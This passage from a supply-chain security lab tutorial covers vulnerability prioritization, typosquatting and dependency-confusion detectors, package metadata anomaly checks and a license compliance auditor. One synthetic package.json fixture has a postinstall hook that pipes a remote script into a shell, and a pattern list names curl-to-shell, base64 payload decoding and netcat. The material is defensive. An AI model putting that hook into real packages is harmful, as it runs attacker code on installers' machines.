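    + epss * 0.35                   # EPSS, weight 0.35
    + (1.0 if kev else 0.0) * 0.15  # KEV bonus, weight 0.15
    + biz * 0.20,                   # business impact, weight 0.20
    1.0,
), 4)
print(risk)  # 0.595 -> P2-HIGH band (0.4 <= risk < 0.6)
```

Working one entry by hand like this is a cheap way to catch weighting mistakes before trusting an automated priority queue.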
3.4 — Vulnerability Prioritization Decision Tree¶
flowchart TD
A[New Vulnerability Detected] --> B{CISA KEV Listed?}
B -->|Yes| C[P0-EMERGENCY<br/>Patch within 24h]
B -->|No| D{EPSS Score >= 0.7?}
D -->|Yes| E{CVSS >= 7.0?}
E -->|Yes| C
E -->|No| F[P1-CRITICAL<br/>Patch within 72h]
D -->|No| G{CVSS >= 7.0?}
G -->|Yes| H{Internet-facing?}
H -->|Yes| F
H -->|No| I[P2-HIGH<br/>Patch within 7 days]
G -->|No| J{EPSS >= 0.3?}
J -->|Yes| I
J -->|No| K{CVSS >= 4.0?}
K -->|Yes| L[P3-MEDIUM<br/>Patch within 30 days]
K -->|No| M[P4-LOW<br/>Accept or patch opportunistically]
style C fill:#d32f2f,color:#fff
style F fill:#f57c00,color:#fff
style I fill:#fbc02d,color:#000
style L fill:#1976d2,color:#fff
    style M fill:#388e3c,color:#fff
Phase 4: Malicious Package Detection¶
Objective¶
Identify indicators of malicious packages including typosquatting, dependency confusion, metadata anomalies, and suspicious install scripts.
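Typosquatting and dependency confusion each get a dedicated detector below; suspicious install scripts can be screened with a simple pattern match over a package manifest. This is an illustrative sketch (the pattern list and the synthetic package.json are invented for the example, not a production ruleset):

```python
import json
import re

# Heuristic patterns seen in malicious npm lifecycle scripts
# (illustrative subset, not an exhaustive ruleset).
SUSPICIOUS = [
    (r"curl\s+[^|]*\|\s*(ba)?sh", "pipes a remote download into a shell"),
    (r"base64\s+(-d|--decode)", "decodes an embedded base64 payload"),
    (r"\bnc\b|\bncat\b", "invokes a raw network client"),
]

# Inline synthetic package.json with a hostile postinstall hook.
manifest = json.loads("""
{"name": "meridian-helper", "version": "1.0.0",
 "scripts": {"postinstall": "curl http://203.0.113.10/x.sh | sh"}}
""")

findings = []
for hook, cmd in manifest.get("scripts", {}).items():
    # Only lifecycle hooks that run automatically at install time.
    if hook in ("preinstall", "install", "postinstall"):
        for pattern, why in SUSPICIOUS:
            if re.search(pattern, cmd):
                findings.append((hook, why))

for hook, why in findings:
    print(f"⚠ {hook}: {why}")
```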
4.1 — Typosquatting Detection¶
Typosquatting Is a Leading Supply Chain Attack Vector
Attackers publish packages with names similar to popular libraries (e.g., lod-ash instead of lodash, reqeusts instead of requests). Automated detection is essential because manual review does not scale. See Chapter 24 — Supply Chain Attacks for real-world case studies.
cat > ~/lab31-sbom/scripts/typosquat_detector.py << 'TYPOSQUAT'
#!/usr/bin/env python3
"""
Typosquatting Detector — Identifies potential typosquatting packages in SBOMs
by comparing component names against known-good package registries.
Lab 31: SBOM Analysis & Supply Chain Security
"""
import json
import sys
from difflib import SequenceMatcher
# ── Known popular packages (synthetic registry snapshot) ──
POPULAR_PACKAGES = {
"npm": [
"express", "lodash", "axios", "react", "webpack", "moment",
"jsonwebtoken", "helmet", "cors", "dotenv", "mongoose", "winston",
"bcryptjs", "passport", "uuid", "semver", "commander", "chalk",
"debug", "body-parser", "cookie-parser", "compression", "morgan",
"multer", "nodemon", "jest", "mocha", "typescript", "eslint",
"prettier", "next", "nuxt", "vue", "angular", "svelte",
"socket.io", "graphql", "prisma", "sequelize", "knex",
],
"pypi": [
"requests", "flask", "django", "pandas", "numpy", "scipy",
"sqlalchemy", "celery", "redis", "boto3", "cryptography",
"pyyaml", "jinja2", "pillow", "gunicorn", "uvicorn",
"fastapi", "pydantic", "httpx", "aiohttp", "beautifulsoup4",
"scrapy", "pytest", "black", "mypy", "ruff", "setuptools",
"pip", "wheel", "paramiko", "psycopg2", "pymongo",
],
"maven": [
"spring-boot-starter-web", "spring-boot-starter-security",
"jackson-databind", "log4j-core", "guava", "commons-text",
"commons-lang3", "commons-io", "slf4j-api", "logback-classic",
"junit-jupiter", "mockito-core", "postgresql", "mysql-connector-java",
"httpclient", "okhttp", "gson", "lombok", "mapstruct",
],
}
# ── Known typosquatting patterns ──
TYPOSQUAT_PATTERNS = {
"char_swap": "Adjacent character transposition (e.g., reqeusts → requests)",
"char_omit": "Missing character (e.g., requets → requests)",
"char_add": "Extra character (e.g., requestss → requests)",
"char_replace": "Similar character substitution (e.g., req0ests → requests)",
"separator": "Separator manipulation (e.g., lodash → lod-ash, lod_ash)",
"scope_squat": "Scope/namespace confusion (e.g., @meridian/lodash vs lodash)",
"plural": "Plural/singular confusion (e.g., request → requests)",
"combo_squat": "Combining known names (e.g., lodash-utils, express-helper)",
}
def string_similarity(a: str, b: str) -> float:
"""Calculate normalized string similarity using SequenceMatcher."""
return SequenceMatcher(None, a.lower(), b.lower()).ratio()
def check_char_distance(name: str, known: str) -> int:
"""Calculate Levenshtein-like edit distance."""
if len(name) == 0:
return len(known)
if len(known) == 0:
return len(name)
matrix = [[0] * (len(known) + 1) for _ in range(len(name) + 1)]
for i in range(len(name) + 1):
matrix[i][0] = i
for j in range(len(known) + 1):
matrix[0][j] = j
for i in range(1, len(name) + 1):
for j in range(1, len(known) + 1):
cost = 0 if name[i-1] == known[j-1] else 1
matrix[i][j] = min(
matrix[i-1][j] + 1, # deletion
matrix[i][j-1] + 1, # insertion
matrix[i-1][j-1] + cost, # substitution
)
return matrix[len(name)][len(known)]
def detect_typosquats(sbom_path: str, threshold: float = 0.85) -> list[dict]:
"""Scan an SBOM for potential typosquatting packages."""
with open(sbom_path) as f:
data = json.load(f)
findings = []
for comp in data.get("components", []):
name = comp.get("name", "")
purl = comp.get("purl", "")
# Determine ecosystem
ecosystem = None
if "pkg:npm/" in purl:
ecosystem = "npm"
elif "pkg:pypi/" in purl:
ecosystem = "pypi"
elif "pkg:maven/" in purl:
ecosystem = "maven"
if not ecosystem:
continue
known_packages = POPULAR_PACKAGES.get(ecosystem, [])
# Skip if the package IS a known package
if name.lower() in [p.lower() for p in known_packages]:
continue
# Check similarity against all known packages
for known in known_packages:
similarity = string_similarity(name, known)
edit_dist = check_char_distance(name.lower(), known.lower())
if similarity >= threshold and edit_dist > 0 and edit_dist <= 3:
pattern = "unknown"
if len(name) == len(known):
pattern = "char_swap" if edit_dist == 1 else "char_replace"
elif len(name) < len(known):
pattern = "char_omit"
elif len(name) > len(known):
pattern = "char_add"
if "-" in name and "-" not in known:
pattern = "separator"
findings.append({
"component": name,
"version": comp.get("version", "unknown"),
"similar_to": known,
"similarity": round(similarity, 4),
"edit_distance": edit_dist,
"pattern": pattern,
"pattern_desc": TYPOSQUAT_PATTERNS.get(pattern, "Unknown pattern"),
"risk": "HIGH" if similarity >= 0.90 else "MEDIUM",
})
return findings
def print_typosquat_report(findings: list[dict], sbom_name: str):
"""Display typosquatting analysis results."""
print(f"\n{'='*70}")
print(f"Typosquatting Analysis: {sbom_name}")
print(f"{'='*70}")
if not findings:
print(f" ✓ No typosquatting indicators detected.")
return
print(f" ⚠ {len(findings)} potential typosquatting indicator(s) found!\n")
for f in sorted(findings, key=lambda x: -x["similarity"]):
risk_icon = "🔴" if f["risk"] == "HIGH" else "🟡"
print(f" {risk_icon} [{f['risk']}] {f['component']}@{f['version']}")
print(f" Similar to: {f['similar_to']}")
print(f" Similarity: {f['similarity']:.2%}")
print(f" Edit distance: {f['edit_distance']}")
print(f" Pattern: {f['pattern_desc']}")
print()
print(f" RECOMMENDATION: Manually verify each flagged package.")
print(f" Check npm/PyPI/Maven Central to confirm the package is legitimate.")
print(f" Review the package's GitHub repository, maintainer history, and download counts.")
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: python typosquat_detector.py <sbom-cdx.json> [...]")
sys.exit(1)
for path in sys.argv[1:]:
findings = detect_typosquats(path)
print_typosquat_report(findings, path)
TYPOSQUAT
chmod +x ~/lab31-sbom/scripts/typosquat_detector.py
Run:
python3 ~/lab31-sbom/scripts/typosquat_detector.py \
sboms/web-portal-syft-cdx.json \
sboms/data-pipeline-syft-cdx.json
Real-World Enhancement
In production, enhance this detector with:
- Keyboard distance analysis — characters that are adjacent on QWERTY keyboards are common typos
- Homoglyph detection — Unicode characters that look like ASCII (e.g., rеquests with a Cyrillic е)
- Historical name analysis — packages that were recently renamed or transferred ownership
- Download count comparison — legitimate packages have orders of magnitude more downloads
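The homoglyph item above can be sketched with a small confusables table. The mapping here is an illustrative subset of the Unicode confusables data, not the full list:

```python
# Minimal Cyrillic-to-Latin confusables map (illustrative subset).
CONFUSABLES = {
    "\u0430": "a",  # Cyrillic а
    "\u0435": "e",  # Cyrillic е
    "\u043e": "o",  # Cyrillic о
    "\u0440": "p",  # Cyrillic р
    "\u0441": "c",  # Cyrillic с
    "\u0445": "x",  # Cyrillic х
}

def normalize_homoglyphs(name: str) -> str:
    """Fold known lookalike characters to their ASCII equivalents."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in name)

def has_homoglyphs(name: str) -> bool:
    """True if the name changes under confusable folding."""
    return normalize_homoglyphs(name) != name

# "r\u0435quests" is "requests" with a Cyrillic е in place of ASCII e.
print(has_homoglyphs("r\u0435quests"))        # True
print(normalize_homoglyphs("r\u0435quests"))  # requests
```

After folding, the normalized name can be fed through the same similarity checks used by detect_typosquats.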
4.2 — Dependency Confusion Detection¶
cat > ~/lab31-sbom/scripts/dep_confusion_detector.py << 'DEP_CONFUSION'
#!/usr/bin/env python3
"""
Dependency Confusion Detector — Identifies packages at risk of
dependency confusion attacks (internal names that could collide
with public registry packages).
Lab 31: SBOM Analysis & Supply Chain Security
"""
import json
import sys
import re
# ── Simulated internal package registry (nexus.internal.example.com) ──
INTERNAL_PACKAGES = {
"npm": [
"@meridian/auth-utils",
"@meridian/config-loader",
"@meridian/logging",
"@meridian/crypto-helpers",
"@meridian/rate-limiter",
"meridian-common",
"meridian-db-client",
"meridian-queue-worker",
],
"pypi": [
"meridian-auth",
"meridian-config",
"meridian-utils",
"meridian-data-models",
"internal-crypto",
"corp-logging",
],
"maven": [
"com.meridian:auth-service",
"com.meridian:common-utils",
"com.meridian:config-client",
"com.meridian.internal:crypto",
],
}
# ── Indicators of dependency confusion risk ──
RISK_INDICATORS = {
"no_scope": "Package lacks a scoped namespace (@org/pkg) — vulnerable to public squatting",
"internal_prefix": "Package uses an internal naming convention that may not be reserved on public registry",
"private_not_set": "Package.json does not set 'private: true' — npm publish could leak it",
"no_registry_lock": "No .npmrc or pip.conf restricting package sources",
"version_conflict": "Internal package version < public package version — pip/npm may prefer the public one",
}
def check_dependency_confusion(sbom_path: str) -> list[dict]:
"""Analyze SBOM components for dependency confusion risks."""
with open(sbom_path) as f:
data = json.load(f)
findings = []
for comp in data.get("components", []):
name = comp.get("name", "")
purl = comp.get("purl", "")
version = comp.get("version", "unknown")
risks = []
# Check if it looks like an internal package
internal_patterns = [
r"^@meridian/",
r"^meridian-",
r"^internal-",
r"^corp-",
r"^com\.meridian",
]
is_internal = any(re.match(p, name, re.IGNORECASE) for p in internal_patterns)
if is_internal:
# Check for scoping (npm)
if "pkg:npm/" in purl and not name.startswith("@"):
risks.append({
"indicator": "no_scope",
"detail": RISK_INDICATORS["no_scope"],
"severity": "HIGH",
"recommendation": f"Rename '{name}' to '@meridian/{name}' and reserve the scoped name on npmjs.com",
})
# Check naming convention
risks.append({
"indicator": "internal_prefix",
"detail": RISK_INDICATORS["internal_prefix"],
"severity": "MEDIUM",
"recommendation": f"Register '{name}' as a placeholder on the public registry to prevent squatting",
})
if risks:
findings.append({
"component": name,
"version": version,
"purl": purl,
"is_internal": is_internal,
"risks": risks,
})
return findings
def print_confusion_report(findings: list[dict], sbom_name: str):
"""Display dependency confusion analysis results."""
print(f"\n{'='*70}")
print(f"Dependency Confusion Analysis: {sbom_name}")
print(f"{'='*70}")
if not findings:
print(f" ✓ No dependency confusion risks detected.")
print(f" NOTE: Ensure .npmrc / pip.conf restricts package sources.")
return
print(f" ⚠ {len(findings)} component(s) with dependency confusion risk\n")
for f in findings:
print(f" Component: {f['component']}@{f['version']}")
print(f" PURL: {f['purl']}")
for risk in f["risks"]:
print(f" [{risk['severity']}] {risk['indicator']}")
print(f" {risk['detail']}")
print(f" Fix: {risk['recommendation']}")
print()
print(f" --- Mitigation Checklist ---")
print(f" [ ] Reserve internal package names on public registries")
print(f" [ ] Use scoped packages (@org/pkg) for all internal npm packages")
print(f" [ ] Configure .npmrc with registry=https://nexus.internal.example.com/npm/")
print(f" [ ] Configure pip.conf with --index-url https://nexus.internal.example.com/pypi/simple/")
print(f" [ ] Set 'private: true' in all internal package.json files")
print(f" [ ] Use Maven settings.xml to restrict repository sources")
print(f" [ ] Enable Artifactory/Nexus 'exclude' rules for internal namespaces on remote repos")
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: python dep_confusion_detector.py <sbom-cdx.json> [...]")
sys.exit(1)
for path in sys.argv[1:]:
findings = check_dependency_confusion(path)
print_confusion_report(findings, path)
DEP_CONFUSION
chmod +x ~/lab31-sbom/scripts/dep_confusion_detector.py
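The registry-pinning items from the script's mitigation checklist can be materialized as client configs. A sketch using this lab's synthetic Nexus hostname (the `~/lab31-sbom/configs/` location is an arbitrary choice for the lab; in production these live at `~/.npmrc` and `~/.pip/pip.conf` or their per-project equivalents):

```shell
mkdir -p ~/lab31-sbom/configs

# .npmrc — route all installs through the internal registry, and pin the
# @meridian scope explicitly so it can never resolve from the public registry
cat > ~/lab31-sbom/configs/.npmrc << 'NPMRC'
registry=https://nexus.internal.example.com/npm/
@meridian:registry=https://nexus.internal.example.com/npm/
NPMRC

# pip.conf — force pip to the internal index only
cat > ~/lab31-sbom/configs/pip.conf << 'PIPCONF'
[global]
index-url = https://nexus.internal.example.com/pypi/simple/
PIPCONF
```

Scope pinning is the key line: even if an attacker publishes `@meridian/auth-utils` publicly, a client with the scope mapping above will never fetch it.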
4.3 — Package Metadata Anomaly Detection¶
cat > ~/lab31-sbom/scripts/metadata_anomaly.py << 'METADATA'
#!/usr/bin/env python3
"""
Package Metadata Anomaly Detector — Identifies suspicious metadata patterns
that may indicate a compromised or malicious package.
Lab 31: SBOM Analysis & Supply Chain Security
Detection patterns inspired by Phylum and Socket.dev research.
"""
import json
import sys
from datetime import datetime, timedelta
from dataclasses import dataclass
@dataclass
class MetadataAnomaly:
component: str
version: str
anomaly_type: str
severity: str
detail: str
recommendation: str
# ── Synthetic package metadata (simulates registry API responses) ──
PACKAGE_METADATA = {
"express": {
"first_published": "2010-12-29",
"latest_publish": "2024-03-25",
"maintainer_count": 3,
"maintainer_changes_90d": 0,
"weekly_downloads": 32000000,
"has_install_scripts": False,
"repo_url": "https://github.com/expressjs/express",
"repo_stars": 64000,
"license": "MIT",
"deprecated": False,
},
"lodash": {
"first_published": "2012-04-12",
"latest_publish": "2021-02-20",
"maintainer_count": 2,
"maintainer_changes_90d": 0,
"weekly_downloads": 52000000,
"has_install_scripts": False,
"repo_url": "https://github.com/lodash/lodash",
"repo_stars": 59000,
"license": "MIT",
"deprecated": False,
},
"synth-suspicious-pkg": {
"first_published": "2026-04-10",
"latest_publish": "2026-04-11",
"maintainer_count": 1,
"maintainer_changes_90d": 1,
"weekly_downloads": 47,
"has_install_scripts": True,
"repo_url": "",
"repo_stars": 0,
"license": "NOASSERTION",
"deprecated": False,
},
"synth-hijacked-pkg": {
"first_published": "2020-06-15",
"latest_publish": "2026-04-08",
"maintainer_count": 1,
"maintainer_changes_90d": 2,
"weekly_downloads": 1200,
"has_install_scripts": True,
"repo_url": "https://github.internal.example.com/unknown-user/hijacked-pkg",
"repo_stars": 3,
"license": "MIT",
"deprecated": False,
},
}
def check_anomalies(pkg_name: str, metadata: dict) -> list[MetadataAnomaly]:
"""Check package metadata for suspicious patterns."""
anomalies = []
today = datetime(2026, 4, 12)
# 1. Recently published package (< 30 days old)
first_pub = datetime.strptime(metadata["first_published"], "%Y-%m-%d")
age_days = (today - first_pub).days
if age_days < 30:
anomalies.append(MetadataAnomaly(
component=pkg_name,
version="*",
anomaly_type="NEW_PACKAGE",
severity="HIGH",
detail=f"Package is only {age_days} days old (first published: {metadata['first_published']})",
recommendation="Manually review package source code before use. New packages are high-risk for supply chain attacks.",
))
# 2. Low download count
if metadata["weekly_downloads"] < 100:
anomalies.append(MetadataAnomaly(
component=pkg_name,
version="*",
anomaly_type="LOW_POPULARITY",
severity="MEDIUM",
detail=f"Weekly downloads: {metadata['weekly_downloads']} (threshold: 100)",
recommendation="Low-download packages are more likely to be malicious. Verify the package serves a legitimate purpose.",
))
# 3. Maintainer changes in last 90 days
if metadata["maintainer_changes_90d"] > 0:
anomalies.append(MetadataAnomaly(
component=pkg_name,
version="*",
anomaly_type="MAINTAINER_CHANGE",
severity="HIGH",
detail=f"Maintainer changed {metadata['maintainer_changes_90d']} time(s) in the last 90 days",
recommendation="Account takeover is a common supply chain vector. Verify the new maintainer is legitimate.",
))
# 4. Install scripts present
if metadata["has_install_scripts"]:
anomalies.append(MetadataAnomaly(
component=pkg_name,
version="*",
anomaly_type="INSTALL_SCRIPTS",
severity="HIGH",
detail="Package contains install scripts (preinstall/postinstall hooks)",
recommendation="Install scripts execute arbitrary code during 'npm install'. Review the scripts for malicious behavior (data exfiltration, reverse shells, crypto miners).",
))
# 5. No repository URL
if not metadata["repo_url"]:
anomalies.append(MetadataAnomaly(
component=pkg_name,
version="*",
anomaly_type="NO_REPOSITORY",
severity="MEDIUM",
detail="No source code repository linked",
recommendation="Packages without linked repositories cannot be audited. Avoid using packages with no verifiable source.",
))
# 6. No license declared
if metadata["license"] in ["NOASSERTION", "", None]:
anomalies.append(MetadataAnomaly(
component=pkg_name,
version="*",
anomaly_type="NO_LICENSE",
severity="LOW",
detail="No license declared",
recommendation="Packages without licenses have undefined usage rights and may indicate a throwaway/malicious package.",
))
# 7. Single maintainer
if metadata["maintainer_count"] <= 1:
anomalies.append(MetadataAnomaly(
component=pkg_name,
version="*",
anomaly_type="SINGLE_MAINTAINER",
severity="LOW",
detail="Package has a single maintainer (bus factor = 1)",
recommendation="Single-maintainer packages are high-risk for account takeover. Consider pinning versions and monitoring for unexpected updates.",
))
return anomalies
def analyze_sbom_metadata(sbom_path: str) -> list[MetadataAnomaly]:
"""Analyze all components in an SBOM for metadata anomalies."""
with open(sbom_path) as f:
data = json.load(f)
all_anomalies = []
for comp in data.get("components", []):
name = comp.get("name", "")
if name in PACKAGE_METADATA:
anomalies = check_anomalies(name, PACKAGE_METADATA[name])
all_anomalies.extend(anomalies)
return all_anomalies
def print_anomaly_report(anomalies: list[MetadataAnomaly], sbom_name: str):
"""Display metadata anomaly findings."""
print(f"\n{'='*70}")
print(f"Package Metadata Anomaly Report: {sbom_name}")
print(f"{'='*70}")
if not anomalies:
print(f" ✓ No metadata anomalies detected.")
return
print(f" {len(anomalies)} anomaly/anomalies detected\n")
severity_order = {"HIGH": 0, "MEDIUM": 1, "LOW": 2}
for a in sorted(anomalies, key=lambda x: severity_order.get(x.severity, 99)):
        icon = {"HIGH": "🔴", "MEDIUM": "🟡", "LOW": "🔵"}.get(a.severity, "⚪")
        print(f" {icon} [{a.severity}] {a.anomaly_type} — {a.component}")
print(f" {a.detail}")
print(f" Action: {a.recommendation}")
print()
if __name__ == "__main__":
if len(sys.argv) < 2:
# Demo mode with synthetic data
print("Running in demo mode with synthetic package metadata...")
for pkg_name, metadata in PACKAGE_METADATA.items():
anomalies = check_anomalies(pkg_name, metadata)
if anomalies:
print(f"\n--- {pkg_name} ---")
                for a in sorted(anomalies, key=lambda x: {"HIGH": 0, "MEDIUM": 1, "LOW": 2}.get(x.severity, 99)):
print(f" [{a.severity}] {a.anomaly_type}: {a.detail}")
else:
for path in sys.argv[1:]:
anomalies = analyze_sbom_metadata(path)
print_anomaly_report(anomalies, path)
METADATA
chmod +x ~/lab31-sbom/scripts/metadata_anomaly.py
Run in demo mode (no arguments triggers the built-in synthetic dataset):
python3 ~/lab31-sbom/scripts/metadata_anomaly.py
Expected output:
Running in demo mode with synthetic package metadata...
--- synth-suspicious-pkg ---
[HIGH] NEW_PACKAGE: Package is only 2 days old (first published: 2026-04-10)
[HIGH] MAINTAINER_CHANGE: Maintainer changed 1 time(s) in the last 90 days
[HIGH] INSTALL_SCRIPTS: Package contains install scripts (preinstall/postinstall hooks)
[MEDIUM] LOW_POPULARITY: Weekly downloads: 47 (threshold: 100)
[MEDIUM] NO_REPOSITORY: No source code repository linked
[LOW] NO_LICENSE: No license declared
[LOW] SINGLE_MAINTAINER: Package has a single maintainer (bus factor = 1)
--- synth-hijacked-pkg ---
[HIGH] MAINTAINER_CHANGE: Maintainer changed 2 time(s) in the last 90 days
[HIGH] INSTALL_SCRIPTS: Package contains install scripts (preinstall/postinstall hooks)
[LOW] SINGLE_MAINTAINER: Package has a single maintainer (bus factor = 1)
Production Enhancements
For real-world deployment, integrate with:
- Socket.dev API — real-time package risk scoring with install script analysis
- Phylum CLI — automated package analysis in CI/CD
- npm audit signatures — verify package provenance via Sigstore
- pip-audit — Python-specific vulnerability and metadata analysis
- Snyk Advisor — package health scoring across ecosystems
Phase 5: License Compliance¶
Objective¶
Extract license information from SBOMs, identify copyleft vs permissive licenses, detect conflicts, and build a compliance matrix.
5.1 — License Extraction and Classification¶
cat > ~/lab31-sbom/scripts/license_audit.py << 'LICENSE_AUDIT'
#!/usr/bin/env python3
"""
License Compliance Auditor — Extracts and classifies licenses from SBOMs,
detects conflicts, and generates compliance reports.
Lab 31: SBOM Analysis & Supply Chain Security
"""
import json
import sys
from dataclasses import dataclass, field
from enum import Enum
class LicenseCategory(Enum):
PERMISSIVE = "permissive"
WEAK_COPYLEFT = "weak-copyleft"
STRONG_COPYLEFT = "strong-copyleft"
COMMERCIAL = "commercial"
PUBLIC_DOMAIN = "public-domain"
UNKNOWN = "unknown"
PROHIBITED = "prohibited"
# ── License classification database ──
LICENSE_DB = {
# Permissive licenses
"MIT": LicenseCategory.PERMISSIVE,
"Apache-2.0": LicenseCategory.PERMISSIVE,
"BSD-2-Clause": LicenseCategory.PERMISSIVE,
"BSD-3-Clause": LicenseCategory.PERMISSIVE,
"ISC": LicenseCategory.PERMISSIVE,
"0BSD": LicenseCategory.PERMISSIVE,
"Unlicense": LicenseCategory.PUBLIC_DOMAIN,
"CC0-1.0": LicenseCategory.PUBLIC_DOMAIN,
"WTFPL": LicenseCategory.PERMISSIVE,
"Zlib": LicenseCategory.PERMISSIVE,
# Weak copyleft
"LGPL-2.0-only": LicenseCategory.WEAK_COPYLEFT,
"LGPL-2.1-only": LicenseCategory.WEAK_COPYLEFT,
"LGPL-3.0-only": LicenseCategory.WEAK_COPYLEFT,
"MPL-2.0": LicenseCategory.WEAK_COPYLEFT,
"EPL-2.0": LicenseCategory.WEAK_COPYLEFT,
"CDDL-1.0": LicenseCategory.WEAK_COPYLEFT,
# Strong copyleft
"GPL-2.0-only": LicenseCategory.STRONG_COPYLEFT,
"GPL-3.0-only": LicenseCategory.STRONG_COPYLEFT,
"AGPL-3.0-only": LicenseCategory.STRONG_COPYLEFT,
# Prohibited (example enterprise policy)
"SSPL-1.0": LicenseCategory.PROHIBITED,
"Commons-Clause": LicenseCategory.PROHIBITED,
}
# ── Enterprise license policy ──
ENTERPRISE_POLICY = {
"allowed": [
LicenseCategory.PERMISSIVE,
LicenseCategory.PUBLIC_DOMAIN,
],
"review_required": [
LicenseCategory.WEAK_COPYLEFT,
],
"prohibited": [
LicenseCategory.STRONG_COPYLEFT,
LicenseCategory.PROHIBITED,
],
"unknown_action": "BLOCK", # BLOCK or REVIEW
}
@dataclass
class LicenseResult:
component: str
version: str
license_id: str
category: LicenseCategory
policy_status: str # ALLOWED, REVIEW, PROHIBITED, UNKNOWN
detail: str = ""
def classify_license(license_id: str) -> LicenseCategory:
"""Classify a license identifier into a category."""
if not license_id or license_id in ["NOASSERTION", "NONE", ""]:
return LicenseCategory.UNKNOWN
# Normalize common variations
normalized = license_id.strip()
if normalized in LICENSE_DB:
return LICENSE_DB[normalized]
    # Map -or-later variants (and bare IDs like "GPL-3.0") onto the DB's -only entries
    if f"{normalized}-only" in LICENSE_DB:
        return LICENSE_DB[f"{normalized}-only"]
    if normalized.endswith("-or-later"):
        base = normalized[: -len("-or-later")]
        if f"{base}-only" in LICENSE_DB:
            return LICENSE_DB[f"{base}-only"]
return LicenseCategory.UNKNOWN
def check_policy(category: LicenseCategory) -> str:
"""Check license category against enterprise policy."""
if category in ENTERPRISE_POLICY["allowed"]:
return "ALLOWED"
elif category in ENTERPRISE_POLICY["review_required"]:
return "REVIEW"
elif category in ENTERPRISE_POLICY["prohibited"]:
return "PROHIBITED"
else:
return "UNKNOWN"
def audit_sbom_licenses(sbom_path: str) -> list[LicenseResult]:
"""Extract and classify all licenses from a CycloneDX SBOM."""
with open(sbom_path) as f:
data = json.load(f)
results = []
for comp in data.get("components", []):
name = comp.get("name", "UNKNOWN")
version = comp.get("version", "UNKNOWN")
licenses = []
for lic in comp.get("licenses", []):
if "license" in lic:
license_id = lic["license"].get("id", lic["license"].get("name", "NOASSERTION"))
licenses.append(license_id)
elif "expression" in lic:
licenses.append(lic["expression"])
if not licenses:
licenses = ["NOASSERTION"]
for license_id in licenses:
category = classify_license(license_id)
policy_status = check_policy(category)
detail = ""
if policy_status == "PROHIBITED":
detail = f"License '{license_id}' is PROHIBITED by enterprise policy. Remove this dependency or obtain legal exception."
elif policy_status == "REVIEW":
detail = f"License '{license_id}' requires legal review before use in commercial products."
elif policy_status == "UNKNOWN":
detail = f"License '{license_id}' is not in the classification database. Manual review required."
results.append(LicenseResult(
component=name,
version=version,
license_id=license_id,
category=category,
policy_status=policy_status,
detail=detail,
))
return results
def print_license_report(results: list[LicenseResult], sbom_name: str):
"""Generate a formatted license compliance report."""
print(f"\n{'='*70}")
print(f"License Compliance Report: {sbom_name}")
print(f"{'='*70}")
print(f"Total components analyzed: {len(results)}")
# Category breakdown
category_counts = {}
for r in results:
cat = r.category.value
category_counts[cat] = category_counts.get(cat, 0) + 1
print(f"\nLicense Category Distribution:")
for cat, count in sorted(category_counts.items()):
bar = "█" * count
print(f" {cat:<20} {count:>3} {bar}")
# Policy compliance summary
policy_counts = {}
for r in results:
policy_counts[r.policy_status] = policy_counts.get(r.policy_status, 0) + 1
print(f"\nPolicy Compliance:")
status_icons = {"ALLOWED": "✓", "REVIEW": "⚠", "PROHIBITED": "✗", "UNKNOWN": "?"}
for status in ["ALLOWED", "REVIEW", "PROHIBITED", "UNKNOWN"]:
count = policy_counts.get(status, 0)
icon = status_icons.get(status, " ")
print(f" {icon} {status:<12} {count:>3}")
# Detailed findings for non-ALLOWED
issues = [r for r in results if r.policy_status != "ALLOWED"]
if issues:
print(f"\n--- Action Items ---")
for r in sorted(issues, key=lambda x: {"PROHIBITED": 0, "UNKNOWN": 1, "REVIEW": 2}.get(x.policy_status, 99)):
print(f"\n [{r.policy_status}] {r.component}@{r.version}")
print(f" License: {r.license_id} ({r.category.value})")
if r.detail:
print(f" Action: {r.detail}")
else:
print(f"\n ✓ All components comply with enterprise license policy.")
# Compliance matrix
print(f"\n--- Compliance Matrix ---")
print(f" {'Component':<30} {'Version':<12} {'License':<20} {'Category':<18} {'Status':<12}")
print(f" {'-'*30} {'-'*12} {'-'*20} {'-'*18} {'-'*12}")
for r in sorted(results, key=lambda x: x.component):
status_marker = {"ALLOWED": " ", "REVIEW": "⚠ ", "PROHIBITED": "✗ ", "UNKNOWN": "? "}.get(r.policy_status, " ")
print(f" {status_marker}{r.component:<28} {r.version:<12} {r.license_id:<20} {r.category.value:<18} {r.policy_status:<12}")
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: python license_audit.py <sbom-cdx.json> [...]")
sys.exit(1)
all_results = []
for path in sys.argv[1:]:
results = audit_sbom_licenses(path)
print_license_report(results, path)
all_results.extend(results)
# Cross-application summary
if len(sys.argv) > 2:
print(f"\n{'='*70}")
print(f"AGGREGATE LICENSE COMPLIANCE SUMMARY")
print(f"{'='*70}")
total = len(all_results)
prohibited = sum(1 for r in all_results if r.policy_status == "PROHIBITED")
review = sum(1 for r in all_results if r.policy_status == "REVIEW")
unknown = sum(1 for r in all_results if r.policy_status == "UNKNOWN")
allowed = sum(1 for r in all_results if r.policy_status == "ALLOWED")
compliance_rate = allowed / total * 100 if total > 0 else 0
print(f"Total components: {total}")
print(f"Compliance rate: {compliance_rate:.1f}%")
print(f"Blocked: {prohibited}")
print(f"Review needed: {review}")
print(f"Unclassified: {unknown}")
if prohibited > 0:
print(f"\n⚠ {prohibited} component(s) use PROHIBITED licenses.")
print(f" These MUST be removed or replaced before release.")
LICENSE_AUDIT
chmod +x ~/lab31-sbom/scripts/license_audit.py
Run:
cd ~/lab31-sbom && python3 scripts/license_audit.py \
sboms/web-portal-syft-cdx.json \
sboms/data-pipeline-syft-cdx.json \
sboms/api-gateway-syft-cdx.json
Expected output (web portal excerpt):
======================================================================
License Compliance Report: sboms/web-portal-syft-cdx.json
======================================================================
Total components analyzed: 26
License Category Distribution:
permissive 22 ██████████████████████
unknown 3 ███
public-domain 1 █
Policy Compliance:
✓ ALLOWED 23
⚠ REVIEW 0
✗ PROHIBITED 0
? UNKNOWN 3
--- Action Items ---
[UNKNOWN] swagger-ui-express@5.0.0
License: NOASSERTION (unknown)
Action: License 'NOASSERTION' is not in the classification database. Manual review required.
...
5.2 — License Conflict Detection¶
Common License Conflicts
| Combination | Conflict? | Explanation |
|---|---|---|
| MIT + Apache-2.0 | No | Both permissive, compatible |
| MIT + GPL-3.0 | Yes (if distributing) | GPL requires derivative works to be GPL |
| Apache-2.0 + GPL-2.0 | Yes | Apache-2.0 patent clause incompatible with GPL-2.0 |
